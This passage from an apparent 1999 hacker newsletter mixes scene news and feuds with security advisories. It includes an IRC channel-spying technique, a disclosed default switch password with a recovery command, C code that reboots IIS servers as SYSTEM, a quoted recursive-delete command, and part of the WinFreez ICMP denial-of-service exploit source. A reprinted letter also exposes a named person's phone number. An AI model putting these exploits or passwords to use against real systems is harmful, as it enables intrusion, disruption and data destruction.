private mail to cruciphux@dok.org danke. C*:. @HWA 02.1 Demoniz trashcans his webboard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Less than a month after the very cool bikkel security site closed down demoniz has pulled the plug on his webboard which he left running after closing down the main news site. Citing DoS attacks and spam as being the #1 reasons, it turns my stomach just to think of this...pulled from help net security's site. http://net-security.org/ WEBBOARDS by deepcase, Monday 8th Mar 1999 on 1:34 pm CET Bikkel's Webboard which was first a project for a private webboard with user login and password is finally down. In an email i recieved from demoniz he said "The board is offline for good. I gave my best shot, but it didn't work. The ingoing Denial of Service attacks on our server, the spams and the threats made me so sick that I removed it. I wont provide a service for a scene which is being dominated by little kids." Net Security will think about setting up a new webboard, but we arent sure about this yet. As a side note, we've set up a 'webboard' that is published by the beseen company and it has seen no action as of yet, you might want to check it out and we can see how well it works (or doesn't as the case may be.) - Ed @HWA 03.0 AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse.com ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From Innerpulse.com... AntiOnline.com Threatens Legal Action Contributed by siko Thursday - March 04, 1999. 05:52PM GMT Following a rash of insults at AntiOnline.com, Founder John Vransisomething has threatened legal action against Innerpulse.com. Innerpulse has this statement for Mister AntiOnline: Talk your shit, grab your gat, call your click. But do not ever threaten Innerpulse with legal action unless you want some keys dropped.If you ain't ever been to the ghetto, you wouldn't understand the ghetto. You stay the fuck out of the ghetto. Don't try to tell me using the term 'antionline.com' is a violation of copyright laws. Its a fucking domain name. As for why we throw shit all over you name, this is a very good example of why. He went so far as to say the letter he sent me could not be reproduced without express written permission. Fuck that. You can surf on over to Innerpulse but thats all, just surf on by. It would be the biggest bitch move in Internet history to launch a legal suit at opposition just because your feelings are hurt. Stop trying to be the Microsoft of the underground community. Nothing will be removed. Nothing will be discontinued. And I don't care if someone was stupid enough to invest 60 billion in you. Why don't you go to antihell.com. Punk ass. Yeah, I posted it, What's Up Now Monkey? <link> http://innerpulse.com/jp.txt (The text from the above link appears in its entirety below - Ed) "<pre>aka Siko: I am sending you this letter to officially request that the content that relates to AntiOnline currently posted at the following URL be removed promptly: http://www.innerpulse.com/ By references in your pages, I am sure that you are aware that "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold rights to. The language used on your page is not only inflammatory, it is flat out libelous. That content, combined with references to "AntiOnline" is what has led me to write this letter. While comedic parody is a protected first amendment right, knowingly printing false, libelous information about a company, in the context of it being news, so that others may believe it to be fact, is not. We have received several e-mails from individuals questioning whether some of the information posted on your page, is factual news, or fictional writing. Also, the re-print of trademarks which are the property of another company, without written authorization, do not fall under first amendment rights. By sending you this letter, I am hoping that we can settle this matter without me being forced to seek a legal remedy. However, if you are not willing to cooperate with my requests, I may very well be forced into finding legal recourses, which may include a civil lawsuit. You will receive no further communications from me directly. If the content is not removed within 24 hours, this matter will be handed over to my legal council. Legal action may be filed shortly there after to recover damages done to AntiOnline's trade and reputation. A copy of this letter has been sent "blind carbon" to several third party individuals, so that it may be established that I have given you opportunity to remove the content voluntarily. If you have any questions regarding my request, you may contact me via an e-mail to jp@antionline.com or by phone at (724)773-0940. I would like to thank you in advance for what I hope will be a prompt response to my requests. Very Truly Yours, Mr. John Vranesevich General Partner, AntiOnline -------------------------------------------------------------------------------- This letter is copyright 1999, AntiOnline LLP Reprint without written authorization is strictly prohibited... </pre>" Our Reply to JayPee <link> http://innerpulse.com/jp-reply.txt Hi, After I saw the e-mail you sent to siko I wanted to give you my idea on this issue, as I provide web hosting for Innerpulse.com and occasionally work on the website. Response below. > aka Siko: > > I am sending you this letter to officially request that the content that > relates to AntiOnline currently posted at the following URL be removed > promptly: http://www.innerpulse.com/ If you want to send an official letter, you don't use e-mail. You can redirect official letters to our main administrative NOC at: [CubeSoft Communications] Cp2, Rr2, H.a.m Magdalen Islands, QC G0B 1K0 CANADA > By references in your pages, I am sure that you are aware that > "AntiOnline" is a service mark in which I, Mr. John Vranesevich, hold > rights to. The language used on your page is not only inflammatory, it is > flat out libelous. That content, combined with references to "AntiOnline" > is what has led me to write this letter. First of all, I think you should be consulting a lawyer about this. I did, and I can tell you that mentionning the name "AntiOnline" in a news article is not libelous; as we never even put a link to your website (which would have not been legally wrong either). Is mentionning "Microsoft" in a news article libelous? I don't think so. > While comedic parody is a protected first amendment right, knowingly > printing false, libelous information about a company, in the context of it > being news, so that others may believe it to be fact, is not. We have > received several e-mails from individuals questioning whether some of the > information posted on your page, is factual news, or fictional writing. We don't want to take responsibility of the stupidity of your website's visitors. Tell them to redirect their comments and question to contact@innerpulse.com. My personal opinion is that it is quite obvious whether an article is true or not; Innerpulse adds a touch of humor to it, that's what makes Innerpulse different. > Also, the re-print of trademarks which are the property of another > company, without written authorization, do not fall under first amendment > rights. Ahh I'm beginning to think you are referring to `AntiOnline-O-Rama' from the INN features section. Do you seriously think I would have wasted my time recopying AntiOnline's frontpage entirely? This may be not in the scope of your technical skills, but that is actually a link to a CGI script which simply acts as a proxy - it prints information directly from AntiOnline.com, doing some word search/replaces in the process. By changing the parameter you can do the same with any other website. > By sending you this letter, I am hoping that we can settle this matter > without me being forced to seek a legal remedy. However, if you are not > willing to cooperate with my requests, I may very well be forced into > finding legal recourses, which may include a civil lawsuit. You will > receive > no further communications from me directly. If the content is not removed > within 24 hours, this matter will be handed over to my legal council. > Legal action may be filed shortly there after to recover damages done to > AntiOnline's trade and reputation. I've been in that situation before, just an advice: don't even think about this, this will pass as a violation of free speech. And by the way, who do you want to sue exactly? > A copy of this letter has been sent "blind carbon" to several third party > individuals, so that it may be established that I have given you > opportunity to remove the content voluntarily. I don't think so, John. > If you have any questions regarding my request, you may contact me via an > e-mail to jp@antionline.com or by phone at (724)773-0940. > > I would like to thank you in advance for what I hope will be a prompt > response to my requests. > > Very Truly Yours, > Mr. John Vranesevich > General Partner, AntiOnline @HWA 03.1 The FPSC-IRCD.txt advisory. ~~~~~~~~~~~~~~~~~~~~~~~~~~~ The FPSC-IRCD.txt advisory. --------------------------- By: syg of the FPSC @3/7/98 ircd@FPSC.hemp.net http://FPSC.hemp.net Program affected: IRCD Versions affected: All hybrid and other EFnet IRCD versions. Probably others. Problem: According to the date of this file, thier is a few bugs in hybrid IRCD and maybe others. I've checked DALnet's source and it seems thiers is fixed and not affected. The bug is in match.c of the source code and starts on line 204 at 'tolowertab[]'. Note the line that consists of the following: "'t', 'u', 'v', 'w', 'x', 'y', 'z', '{', '|', '}', '~',". Then go to line 238 in match.c to 'touppertab[]'. Note the line that reads: "'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\', ']', '^'," and look at the two lines. If you notice, it takes the '{' char and defines its uppercase char as '[' as along with defining '|' to '\', '}' to ']', and '~' to '^'. What this means is thier the same characters in channel names and nicknames. Now what can you do with this in such a way it would be a problem? You can spy on channels that consist of any one of those 8 characters below: 1) { --Defined as LowerCase [ 2) [ --Defined as UpperCase { 3) } --Defined as LowerCase ] 4) ] --Defined as UpperCase } 5) | --Defined as LowerCase \ 6) \ --Defined as UpperCase | 7) ~ --Defined as LowerCase ^ 8) ^ --Defined as UpperCase ~ This problem and mIRC make a dangerous combination. Lets say a bunch of your friends hang in #mIRC] and you run BitchX. All you have to do is join #mIRC} and thier mIRC clients wont see you join the channel which means you are a ghost and therefore are invisible. Another example would be... two people are in #Love^2 and you ran BitchX. All you would have to do is join #Love~2 and they wont see you join, therefore you can spy on thier conversation all night long. Now if one of the mIRC people happened to type "/names #mIRC]" or "/names #Love^2" you would magically pop up in the nick list of the channel. That is also the same if someone joins the channel after you have joined, you will show up in thier names list therefore it will put you in thier nick list in the channel window. Be creative and have fun. Logs: The "->->->" is me telling you whats going on. ->->-> In mIRC I typed /join #[ with the nick mIRC-1 *** Now talking in #[ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ @mIRC-1 #[ End of /NAMES list. #[ created on Thu Feb 25 14:13:45 ->->-> Then in another mIRC client I typed /join #{ with the nick mIRC-2 *** Now talking in #{ ->->-> No one is in the channel but me in the nick list. ->->-> Then I looked in my status window and got the join info. #[ mIRC-2 @mIRC-1 #{ End of /NAMES list. #[ + #[ created on Thu Feb 25 14:13:45 ->->-> NOTE: I can't see mIRC-1 in the nick list in the channel. ->->-> I also can't see mIRC-2 in mIRC-1's nick list. ->->-> So basically it's like two different channels when you are in mIRC. ->->-> Let's now bring bitchX into play... ->->-> In BitchX under the nick BitchX-1 i typed /join #[ BitchX-1 [test@FPSC.hemp.net] has joined #[ [Users(#[:3)] [ BitchX-1 ] [ mIRC-2 ] [@mIRC-1 ] Channel #[ was created at Thu Feb 25 14:13:45 1999 BitchX: Join to #[ was synced in 0.391 secs! ->->-> Now under mIRC-1's client I saw... *** BitchX-1 (test@FPSC.hemp.net) has joined #[ ->->-> Which I should have because we are both in #[ ->->-> But on the other hand, under mIRC-2's client( The one in #{ )... ->->-> I didn't see BitchX-1 join. ->->-> And as you can see, BitchX-1 see's mIRC-2 in the channel #[ ->->-> Now let me type with all three of them. ->->-> Under all three clients I will type thier nick and chan to the channel. ->->-> Under BitchX-1's client I saw all three clients talk... <mIRC-1> mIRC-1 #[ <mIRC-2> mIRC-2 #{ <BitchX-1> BitchX-1 #[ ->->-> Under mIRC-1's client I saw myself and BitchX-1 type (We are both in #[) <mIRC-1> mIRC-1 #[ <BitchX-1> BitchX-1 #[ ->->-> Under mIRC-2's client I saw myself type only ( Im in #{ ) <mIRC-2> mIRC-2 #{ ->->-> As you can see mIRC-2 is being spy'd on by the BitchX client. ->->-> End of logs. Sollution: The fix would be to simply edit /src/match.c of the source code. DALnet seems to have a nice match.c at ftp.dal.net in df467.tgz if you EFnet staff need any ideas. We all hope to see this fixed in your next release of hybrid. Final Notes: IRCD coders and staff members of all networks and all IRCD versions need to check your source for this bug and fix it before it gets abused... maybe it was you in #^locals^ giving your phone number out to a friend which was being spy'd on by another local enemy. Other than that, everyone keep up the good work and so long. Also, thanks to sate for helping me test this out. Questions/jobs/info/etc: ircd@FPSC.hemp.net -syg @HWA 04.0 Pentagon under attack ~~~~~~~~~~~~~~~~~~~~~ March 7th, 1999 From http://www.hackernews.com/ Pentagon investigates Russian cyberattacks contributed to HNN by Bronc A probe has been launched into recent efforts of crackers attempting to access Pentagon computer systems. Pentagon officials are unsure if this is a coordinated attack or the work of separate individuals. Early indications show that many of the attacks have originated in Russia and may have had the assistance of a insider. No classified networks have yet been breached. U.S. Deputy Defense Secretary John Hamre has been quoted as saying "It is a major concern." (Ed Note: This is the same John Hamre who last year was quoted as saying "This is the most coordinated attack we have seen to date" when referring to attacks on government systems by three teenagers.) Follow up here: http://abcnews.go.com/sections/world/DailyNews/pentagonrussia990304.html http://www.techserver.com/story/body/0,1634,24763-40126-294330-0,00.html http://www.msnbc.com/news/246801.asp http://www.smh.com.au/news/9903/05/breaking2/news1.html And from Innerpulse.com; www.innerpulse.com United States: Cyberwar? Contributed to Innerpulse by siko Sunday - March 07, 1999. 06:10PM GMT Innerpulse has decided not to join the media inflated 'Cyberwar' reporting until today. We have been doing extensive research and have discovered some exclusive details. We all know the so called 'facts'. Coordinated attacks on certain servers have officials at the Pentagon looking for answers, and quickly. What certain people forget, is that the man who said this is the most organized attack to date, is also the man that said a 16 year old kid named 'Makeveli' had also launched an extremely organized attack on government servers. For those who aren't into the urban musical subculture, Makeveli most likely came from the popular rapper, Tupac's influence. They have stated the attacks are coming from Canada and Thailand amongst others. Yet they can not trace any further. Sorry, if you can tell the country than you have the IP, and the ability to find the source. The United States is not at Cyberwar with anyone but the media, who took a couple of failed hack attempts and turned it into World War III. Innerpulse has conducted various interviews and can now finger the source of this terror. His name is John Vranesevich, which traces back to packetz.antionline.com. In an effort to get more publicity for breaking a story, he blew up a situation leading many respected news outlets into believeing this was actually as blown out of proportion as he made it sound. And on top of that, they pick Hamre, the man who called an Undernet hacker named 'Makeveli', a serious threat the the United States National Security. The Pentagon may be experiencing more attacks lately. This is not blown out of proportion. But if you take a moment to question the motives of people who would attempt to crack into a government server.. Perhaps because it gains you recognition and fame as it has done for so many in the past? This is the same reason antionline.com gets lots of crack attempts every day, because almost everyone in the 'hacker' community wants to be known for breaking the site that sold out. The United States is not currently involved in a Cyber War, never has been, and most likely will not be in any of our reader's lifetimes. But, if someone really cracks a Pentagon server and fires a missile at me, boy won't I feel silly. And a fairly intelligent article with little FUD from ABC news... http://www.abcnews.go.com/sections/tech/DailyNews/pentahack990309.html Pentagon Attacks Overblown? Hackers Complain Government Computers Over-Sensitive By Michael J. Martinez ABCNEWS.com March 9 Last week, the Pentagon reported that over the last several months its computer systems have withstood an unprecedented and concerted series of external attacks. U.S.-based hackers might simulate an attack from abroad by routing their signals through a series of far-flung servers. (ABCNEWS.com) Deputy Defense Secretary John Hamre confirmed the attacks, calling them a major concern. Pentagon officials stated that the electronic infiltrations have come from abroad most likely Russia. To Pentagon watchers, and to members of the loosely knit hacker fraternity in the United States, those claims sounded familiar. Terrorists or Teens? Last February, Hamre announced that the Pentagon was undergoing the most intense, coordinated cyberattack it had ever seen. Over a two-week period, unknown hackers launched coordinated attacks against hundreds of military domains and servers. After weeks of investigation, the culprits were nabbed. They turned out to be an 18-year-old Israeli computer enthusiast with a lot of time on his hands, and two teenagers from California who were using readily available software tools downloaded from the Internet to discredit the PentagonÆs computer security. No hackers claimed credit for the latest assaults; there was no bragging in IRC chat rooms or on Web pages, as typically happens after well-publicized computer attacks on government systems. That could mean a number of different things, says Dr. Peter Tippett, president of ISCA, Inc., a computer security firm. The attacks arenÆt that bad, the person doing it doesnÆt want to take credit, or the attacks are coming from overseas. The latest assaults could have come from foreign governments, terrorist organizations or from the proverbial mischievous teenager. Recon vs. Frontal Assault What exactly constitutes an attack? Hackers customarily scan remote computer systems, looking for security holes through which to send or retrieve data. Tools for such scans are readily available for downloading from the Internet. These scanners basically take known holes and hit a server, one after another, asking it if these holes are open, says an independent hacker known as Bronc Buster. They may or may not be there, but as far as logs on systems will show, unless you are an experienced admin and can tell the difference, you are being attacked. The Pentagon, however, does not differentiate between scans, which is essentially cyberspace reconnaissance, and full attacks, when a malicious system cracker actively attempts to break through security. Tippett points out that scans are useful for later attack, and that determined hackers have found ways to conduct scans without setting off alarms. Most servers have thousands of accounts, and thus thousands of entry points. If a hacker takes his time, and only pings a few entry points every so often, he can usually avoid notice. In recent congressional testimony, Hamre said Defense Department computers are attacked upwards of 60 times per week, with about 10 such attacks requiring additional investigation. He did not differentiate between scans or infiltration attempts. From Russia With Love The theory that the recent attacks came from Russia is also questionable. When it comes to the Internet, geography quickly becomes irrelevant. Hacking tools, some of which are readily available online, could allow a would-be hacker to fake his own locale information, or channel his attack through servers all around the world. I donÆt know how the Pentagon would know where the attacks come from, Tippett says. If you have access to enough servers, itÆs relatively easy to re-route your connection to make it appear youÆre in Russia, when you could just be down the street. Rep. Curt Weldon, R-Pa., who chairs the subcommittee of the House Armed Services Committee where Hamre testified, acknowledges that the starting point of the recent computer assaults still in doubt. But he contends the new attacks represent a new kind of warfare, in which less powerful nations could gain an edge against the United States by hacking into and knocking out key computer systems. This appears to be a coordinated effort to break into our computer system, and we not giving the problem the kind of visibility it needs, Weldon says. This Y2K thing is a piece of cake compare to this. OXBlood Ruffin, foreign minister for the hacker group Cult of the Dead Cow, has another view. It smells like someone is looking for increased budgets, Ruffin wrote in an e-mail, calling HamreÆs alarms a typical crying game from the military. æHackingÆ Into a Government Computer According to a Philadelphia-based hacker who calls himself El Diablo, government computers are far too quick to register an attack. El Diablo, affiliated with the HologramNation hacker group, should know: he accessed the White House Web server. Instead of using a a Web browser, El Diablo accessed the whitehouse.gov host address via Telnet. Telnet is a common way for a user to log directly into a server, accessing the serverÆs systems remotely. Once dialed in, El Diablo encountered the following warning: You are about to access a U.S. Government computer system. Access to this system is restricted to authorized users only. Anyone who accesses this system without authorization, or exceeds authorized access, could be subject to a fine or imprisonment, or both, under Public Law 98-473. The message went on to say that the user was being monitored. The computer then asked for a username and password, at which point El Diablo exited. What this seems to say is that I just æhackedÆ into the government computers, he says. The hackers [accessing Pentagon computers] could have simply done that, and the government could have blown this waaaaaay out of proportion. Many people Telnet into their work computers itÆs not some obscure hacker tool. Yet the White House says what El Diablo did is a potential attack. IÆm sure lots of people Telnet into that server, either to just have a look, or they access it by mistake, and thatÆs OK, said White House spokesman Mark Kitchens. But that is still considered an attempt at breaching security. @HWA 04.1 Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Fri, 5 Mar 1999 12:19:59 -0800 From: JEK <jkolde@EARTHLINK.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Cheyenne InocuLAN for Exchange plain text password still there This dates back to Ron Watkins' post on 12/16/98 regarding the plain text account name/password left in the exchverify.log file by the installation of Cheyenne's Anti-Virus Agent for Exchange. Quote from Ron: "I was called on Monday by Brian Linton at Computer Associates. He says that the plaintext admin password was put into c:\exchverify.log by earlier versions of the Arcserve Exchange client, but that build 57 (the most recent version) puts only the length there. It does not erase that file as new installs are done, but rather appends, which is why some folks still had that plaintext password even after installing the most recent build." I am currently testing AV Agent for Exchange and installed what I was told was the most recent version (build 64) on a clean NT 4.0/SP4/Exchange 5.5 server running InocuLAN for NT 4.0 (build 375). This was a fresh build and *not* upgraded from earlier versions of any software. The exchverify.log file is still there and still contains the account name and password in clear text - NOT merely the length as stated above. JEK, MCSE @HWA 04.2 Default passwords in Bay networks switches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 10 Mar 1999 14:48:58 -0800 From: Jan B. Koum <jkb@BEST.COM> To: BUGTRAQ@netspace.org Subject: Default password in Bay Networks switches. Ok.. so you would think after 3Com $%#& up last year of inserting default password into firmware vendors would learn their lesson? [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] Hah! Welcome to the world of strings and Bay Networks firmware files. I have looked at some bay networks switches and see that the following have default password of "NetICs" BayStack 350T HW:RevC FW:V1.01 SW:V1.2.0.10 BayStack 350T HW:RevC FW:V1.01 SW:V2.0.0.15 These however I was not able to find defaults for: BayStack 350-24T HW:RevA FW:V1.04 SW:V1.0.0.2 Bay Networks BayStack 303 Ethernet Switch BayStack 28115/ADV Fast Ethernet Switch If you have firmware images for the above, just % strings *.img | grep -B5 "Invalid Password" Something similar to this command might give you the passwd. Of course I don't have to tell you about how bad it is when someone can control your network infrastructure (switches). I don't have much experience with Bay hardware (in fact, I have none - someone at work just asked me to help them get into a switch for which they forgot the password). If someone can shed some light on this topic, it would be great. And yes, I consider this to be a backdoor - wouldn't you call it a backdoor if Solaris had default password for root logins? How can vendors in 1999 even THINK about something as stupid as inserting a default password like this into a switch!?!? Granted - I am almost sure Bay didn't have evil intentions for the use .. but still. I am speechless. -- Yan P.S. - Greetz to the inhabitants of #!adm and #!w00w00 ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:06:05 -0700 From: Dax Kelson <dkelson@INCONNECT.COM> To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. On Wed, 10 Mar 1999, Jan B. Koum wrote: > Ok.. so you would think after 3Com $%#& up last year of inserting > default password into firmware vendors would learn their lesson? > [See http://geek-girl.com/bugtraq/1998_2/0340.html for 3com rant] > > Hah! Welcome to the world of strings and Bay Networks firmware > files. I have looked at some bay networks switches and see that > the following have default password of "NetICs" The Bay Networks case number for this bug/oversight is: 990310-614 Normally "backdoor" passwords on Bay gear only work through the console. Dax Kelson Internet Connect, Inc. ------------------------------------------------------------------------------ Date: Wed, 10 Mar 1999 17:16:53 -0800 From: Jon Green <jogreen@NORTELNETWORKS.COM> To: BUGTRAQ@netspace.org Subject: Re: Default password in Bay Networks switches. > And yes, I consider this to be a backdoor - wouldn't you call it > a backdoor if Solaris had default password for root logins? > How can vendors in 1999 even THINK about something as stupid as > inserting a default password like this into a switch!?!? > Granted - I am almost sure Bay didn't have evil intentions for > the use .. but still. I am speechless. This was fixed in version 2.0.3.4 of the BS350 code last November. The backdoor is still there for console access, but not for telnet. This problem only affected the Baystack 350T and 350F, it did not affect the 350-24T or 450. Also, note that the 350 has always had the ability to limit telnet logins to certain source addresses; it is recommended that that feature be used. Software upgrades for the 350 can be found at http://support.baynetworks.com under Software. If you don't have a support contract, call (800) 2LANWAN. -Jon ------------------------------------------------------------------- Jon Green 4301 Great America Pkwy Senior Competitive Test Engineer Santa Clara, CA 95054 Nortel Networks (408) 495-2618 Voice jogreen@nortelnetworks.com (408) 495-4540 Fax ------------------------------------------------------------------- @HWA 04.3 ISAPI Exploit code ~~~~~~~~~~~~~~~~~~ Date: Tue, 9 Mar 1999 10:54:47 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Patrick CHAMBET [mailto:pchambet@club-internet.fr] > Sent: Tuesday, March 09, 1999 5:27 AM > To: Fabien Royer > Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: Re: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > Any proof ? Any sample ? Any work around ? > How can we test our servers ? Using VC++, create an ISAPI extension project and call it CRbExtension. Replace GetExtensionVersion() and Default() with the code below. Compile it to something simple, like rb.dll. Place it on your web server and invoke it from your browser like this http://your.machine.name/scripts/rb.dll? Note: if you are using IE4.0, don't call this from the machine that is running the web server otherwise, the next time you log in, IE will recall the last URL and you'll reboot again. The workaround is to NEVER give users (or customers) the ability to use ISAPI extensions if you allow them to upload CGIs to customize their home page. An .exe on the other hand is much safer (is coded correctly). Fabien. BOOL CRbExtension::GetExtensionVersion(HSE_VERSION_INFO* pVer) { HANDLE hToken; // handle to process token TOKEN_PRIVILEGES tkp; // pointer to token structure // Get the current process token handle so we can get shutdown // privilege. OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); // Get the LUID for shutdown privilege. LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // one privilege to set tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; // Get shutdown privilege for this process. AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); ExitWindowsEx(EWX_REBOOT,0); // Disable shutdown privilege. tkp.Privileges[0].Attributes = 0; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES) NULL, 0); // Call default implementation for initialization CHttpServer::GetExtensionVersion(pVer); // Load description string TCHAR sz[HSE_MAX_EXT_DLL_NAME_LEN+1]; ISAPIVERIFY(::LoadString(AfxGetResourceHandle(),IDS_SERVER, sz,HSE_MAX_EXT_DLL_NAME_LEN)); _tcscpy(pVer->lpszExtensionDesc, sz); return TRUE; } void CRbExtension::Default(CHttpServerContext* pCtxt) { StartContent(pCtxt); WriteTitle(pCtxt); *pCtxt << _T("Reboot<br>"); EndContent(pCtxt); } > > Patrick Chambet > IBM Global Services > > > >There's a vulnerability in IIS (and other WEB servers executing > as SYSTEM) > >that allows to execute an ISAPI extension in the security context of the > >server itself instead of the security context of IUSR_WHATEVER. > How is this > >possible: when the server loads an ISAPI extension the first > time, it calls > >GetExtensionVersion(). During the call to this function, an attacker can > >execute any code as SYSTEM. This is a problem if you're an ISP doing > hosting > >with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. > ) because > >any user allowed to place a "CGI" on the server can take over. Of course, > >this problem is not limited to ISPs. > >Fabien. -=- Prior Discussion & further details ; Date: Mon, 8 Mar 1999 11:27:48 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) that allows to execute an ISAPI extension in the security context of the server itself instead of the security context of IUSR_WHATEVER. How is this possible: when the server loads an ISAPI extension the first time, it calls GetExtensionVersion(). During the call to this function, an attacker can execute any code as SYSTEM. This is a problem if you're an ISP doing hosting with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because any user allowed to place a "CGI" on the server can take over. Of course, this problem is not limited to ISPs. Fabien. -------------------------------------------------------------------------------- Date: Tue, 9 Mar 1999 00:32:03 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM > -----Original Message----- > From: Scott L. Krabler [mailto:scottk@visi.com] > Sent: Monday, March 08, 1999 11:41 PM > To: Fabien Royer; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: RE: ISAPI Extension vulnerability allows to execute code as > SYSTEM > > > By this, I'm assuming the required safeguard would be to only implement > ISAPI filters whose contents are known. Since ISAPI filters can only be Typically, filters and extensions fulfill different purposes. For instance, you would not implement an complete WEB based application as a filter for performance reasons. Filters see all http "traffic" while extensions only see the http traffic that is directed to them. Unless you have written the filter yourself (or someone trusted in your organization), you can't know if a filter is 100% secure either. > installed locally(?) there shouldn't be any general risk. Yes? This is not that simple. You can remotely install a filter under IIS if you can cause the following sequence of events to occur: 1) Place the filter .dll in a location accessible from the web server. 2) Update the registry to register the new filter. 3) Cause a reboot of the machine or stop/start IIS. All of this can be done from the GetExtensionVersion() call mentioned earlier. Finally, you can host a filter *AND* an extension in the same .dll. Fabien. > > -----Original Message----- > From: Windows NT BugTraq Mailing List > [mailto:NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM]On Behalf Of Fabien Royer > Sent: Monday, March 08, 1999 10:28 AM > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM > Subject: ISAPI Extension vulnerability allows to execute code as SYSTEM > > > There's a vulnerability in IIS (and other WEB servers executing as SYSTEM) > that allows to execute an ISAPI extension in the security context of the > server itself instead of the security context of IUSR_WHATEVER. > How is this > possible: when the server loads an ISAPI extension the first > time, it calls > GetExtensionVersion(). During the call to this function, an attacker can > execute any code as SYSTEM. This is a problem if you're an ISP > doing hosting > with web servers offering ISAPI support (IIS, Apache 1.3.4, etc. ) because > any user allowed to place a "CGI" on the server can take over. Of course, > this problem is not limited to ISPs. > Fabien. > -------------------------------------------------------------------------------- Date: Wed, 10 Mar 1999 18:28:24 -0500 From: Fabien Royer <fabienr@BELLATLANTIC.NET> To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Re: ISAPI Extension vulnerability allows to execute code as SYSTEM Sure, however the executable that you are going to execute will run in a separate address space and if it is spawned by IIS, it will run in the security context of IUSR_xxx instead of SYSTEM. This is the *major* difference between what you can do with the .dll approach and the .exe approach. Fabien. > I don't know that .EXE's are that much safer. How about this: > > I upload 4nt.exe (Command.Com/CMD.Exe replacement program) > I write an EXE that calls it and runs the command 'reboot' > or even a 'del /zsx c:\*.*' (Which will recursively delete all > files that aren't currently in use) > > Same idea ... different way about it. > > Being a developer and having the tools available, I require that > I get to compile the code myself. That way, I can scan through > the code to see if it's trying to do anything malicious. > Granted, this isn't 100% foolproof, but it does help! > > Charlie @HWA 04.4 Winfreez.c new exploit code for win9x and NT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The full original source code is followed by a Solaris version and further discussion, from Packetstorm/Bugtraq. (March 11th 1999) http://www.genocide2600.com/~tattooman/new.shtml#latest /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> /* * Structure of an icmp header (from sparc header). */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 